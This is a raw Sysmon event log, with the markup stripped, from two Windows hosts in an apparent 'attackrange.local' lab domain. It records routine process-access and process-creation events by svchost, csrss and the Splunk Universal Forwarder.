16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246625Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246624Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246623Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246622Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-52D3-6063-D122-00000000AF01}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246621Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D3-6063-D122-00000000AF01}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246620Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.555{CB4067E1-52D3-6063-D122-00000000AF01}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246619Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.240{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACFCEB344A7A03B38F58AEF9A07F8D96,SHA256=2C7568EF9CCA26DB5A447083C4350AEE6FE49D22D274C81D49BA00C6492FFD16,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061928Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:21.977{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54863-false10.0.1.12-8000- 10341000x80000000000000001061927Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.573{7F8C56E7-52D4-6063-4C01-00000000AF01}20606080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061926Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D4-6063-4C01-00000000AF01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061925Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061924Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061923Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061922Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061921Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-52D4-6063-4C01-00000000AF01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061920Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.432{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D4-6063-4C01-00000000AF01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061919Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:24.434{7F8C56E7-52D4-6063-4C01-00000000AF01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000246661Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D4-6063-D322-00000000AF01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246660Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246659Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246658Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246657Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246656Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246655Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246654Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246653Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246652Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 